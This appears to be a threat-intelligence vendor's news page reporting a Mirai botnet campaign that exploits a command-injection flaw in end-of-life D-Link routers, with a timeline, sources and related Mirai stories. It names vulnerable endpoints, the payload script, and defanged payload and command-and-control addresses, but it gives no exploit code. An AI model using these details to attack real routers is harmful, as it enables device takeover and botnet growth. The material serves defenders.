Mirai Botnet Exploits CVE-2025-29635 in End-of-Life D-Link DIR-823X Routers
A Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection flaw in end-of-life D-Link DIR-823X routers, marking the first reported in-the-wild abuse of the vulnerability since its public disclosure and proof-of-concept release in 2025. Akamai said it began seeing attacks in early March 2026 through crafted POST requests to the /goform/set_prohibiting endpoint, where unsanitized input reaches system() and enables remote command execution on affected firmware versions 240126 and 240802. The activity targets discontinued devices unlikely to receive vendor fixes, increasing exposure for organizations still running the routers.
The attackers use the exploit to fetch and run a shell script that installs a Mirai variant dubbed tuxnokill, which retains common Mirai strings while using XOR obfuscation with key 0x30. Akamai linked the same actor to similar Mirai deployment patterns against TP-Link AX21 devices via CVE-2023-1389 and against ZTE ZXV10 H108L routers through another remote code execution flaw, underscoring continued botnet weaponization of older, publicly documented vulnerabilities. Security advisories recommend replacing unsupported D-Link hardware, restricting exposed administrative interfaces, and rapidly remediating known router flaws before they are folded into botnet operations.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
HKCERT issues alert on Mirai targeting end-of-life D-Link routers
HKCERT published a security bulletin warning that Mirai botnet activity was targeting end-of-life D-Link routers affected by CVE-2025-29635. The alert reflected broader defender notification following Akamai's findings.
Akamai publicly reports the Mirai campaign targeting D-Link routers
Akamai published research detailing the Mirai campaign targeting end-of-life D-Link DIR-823X routers via CVE-2025-29635 and warned that older, publicly documented flaws continue to be weaponized. The report urged organizations to replace retired devices and improve patching and exposure management.
Akamai links same actor to TP-Link and ZTE router exploitation
Akamai assessed that the same threat actor was also exploiting CVE-2023-1389 in TP-Link AX21 routers and a remote code execution flaw in ZTE ZXV10 H108L routers using a similar Mirai deployment pattern. This expanded the campaign beyond D-Link devices to multiple router brands.
Attackers deploy tuxnokill Mirai variant on compromised routers
The observed campaign downloaded and executed a shell script named dlink.sh to install a Mirai variant called tuxnokill on compromised D-Link routers. Reporting also identified infrastructure including payload host 88.214.20[.]14 and command-and-control server 64.89.161[.]130:44300.
Akamai observes Mirai exploitation of CVE-2025-29635
In early March 2026, Akamai SIRT detected in-the-wild exploitation of CVE-2025-29635 against D-Link DIR-823X routers, marking the first observed active abuse of the flaw. Attackers used crafted POST requests to the /goform/set_prohibiting endpoint to execute commands on vulnerable devices.
Researchers disclose CVE-2025-29635 in D-Link DIR-823X routers
Researchers Wang Jinshuai and Zhao Jiangting publicly disclosed CVE-2025-29635, a command-injection flaw in D-Link DIR-823X routers, and proof-of-concept exploit details became available around the same time. The vulnerability later became the basis for Mirai botnet exploitation.
D-Link DIR-823X routers reach end of life
The affected D-Link DIR-823X devices reached end-of-life status, reducing the likelihood of vendor security fixes for CVE-2025-29635. Subsequent reporting recommended replacing the unsupported routers or restricting exposed administration access.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
5 references tracked. Mallory keeps watching after this page renders.
Discontinued D-Link routers subjected to Mirai botnet targeting | brief | SC Media
scworld.com
Open sourceBotnet Alert - Mirai Botnet Targets End-of-Life D-Link Routers
hkcert.org
Open sourceMirai Botnet exploits CVE-2025-29635 to target legacy D-Link routers
securityaffairs.com
Open sourceNew Mirai campaign exploits RCE flaw in EoL D-Link routers
bleepingcomputer.com
Open sourceCVE-2025-29635: Mirai Campaign Targets D-Link Devices | Akamai
akamai.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Mirai Botnet Operators Probe EoL TP-Link Routers via CVE-2023-33538
Attackers are actively scanning for **CVE-2023-33538**, a command injection flaw in end-of-life TP-Link routers including **TL-WR940N**, **TL-WR740N**, and **TL-WR841N**, in an apparent effort to deploy a Mirai-based Condi botnet variant. Researchers observed malicious requests targeting the `/userRpm/WlanNetworkRpm.htm` interface, abusing SSID-related parameters to fetch an ELF payload such as `arm7` from **51.38.137[.]113** and connect infected devices to infrastructure including **cnc.vietdediserver[.]shop** and **bot.ddosvps.cc**. The activity followed CISA’s addition of the flaw to its Known Exploited Vulnerabilities catalog, underscoring continued attacker interest in legacy edge devices. Palo Alto Networks Unit 42 and other researchers said the vulnerability is real, but the exploitation attempts seen so far were unsuccessful because the campaigns used flawed tradecraft: they lacked valid authentication to the router web interface, targeted incorrect parameters, and relied on tools such as `wget` that are not present in the routers’ constrained BusyBox environments. TP-Link said the affected products are no longer supported and will not receive patches, leaving replacement of the devices and elimination of default or weak administrative credentials as the primary mitigations.
Apr 21, 2026
ShadowV2 Mirai-Based Botnet Exploits IoT Vulnerabilities During AWS Outage
A new Mirai-based botnet variant named **ShadowV2** was observed exploiting a major AWS outage in October to infect IoT devices across 28 countries. Security researchers at Fortinet’s FortiGuard Labs reported that ShadowV2 leveraged at least eight known vulnerabilities in devices from vendors such as D-Link, TP-Link, DD-WRT, DigiEver, and TBK. The botnet propagated rapidly during the day-long AWS disruption, targeting routers, NAS devices, and DVRs in sectors including government, technology, manufacturing, telecommunications, education, and managed security service providers. The attackers used a downloader script (`binary.sh`) to deliver the malware, which then connected to command-and-control infrastructure to receive further instructions. The campaign appeared to be a test run, as the botnet was only active during the AWS outage and did not persist beyond that period. Notably, some of the exploited vulnerabilities, such as `CVE-2024-10914` and `CVE-2024-10915`, affect end-of-life D-Link devices for which no patches are available, leaving many systems permanently exposed. D-Link updated its advisories to warn users about the risks to unsupported devices, while TP-Link addressed one of the flaws with a beta firmware update. The ShadowV2 botnet’s global reach and ability to exploit multiple unpatched IoT vulnerabilities highlight the ongoing risks posed by insecure and unsupported connected devices, especially during periods of widespread internet infrastructure disruption.
Mar 21, 2026
Mirai Variant Exploits Multiple IoT Flaws to Expand Botnet Infections
Palo Alto Networks Unit 42 reported that a new **Mirai** campaign is targeting internet-exposed IoT devices by chaining multiple known exploits to compromise systems and pull them into a botnet. The activity focuses on broad opportunistic scanning and exploitation, continuing Mirai’s long-running pattern of abusing weakly secured embedded devices such as routers, cameras, and other Linux-based appliances. The campaign’s significance lies in its use of several IoT vulnerabilities rather than a single flaw, increasing the number of devices that can be infected and used for follow-on malicious activity such as distributed denial-of-service (**DDoS**) attacks. The report highlights the ongoing risk from unpatched and publicly reachable IoT infrastructure, underscoring the need for rapid patching, exposure reduction, and stronger hardening of embedded systems connected to the internet.
May 25, 2026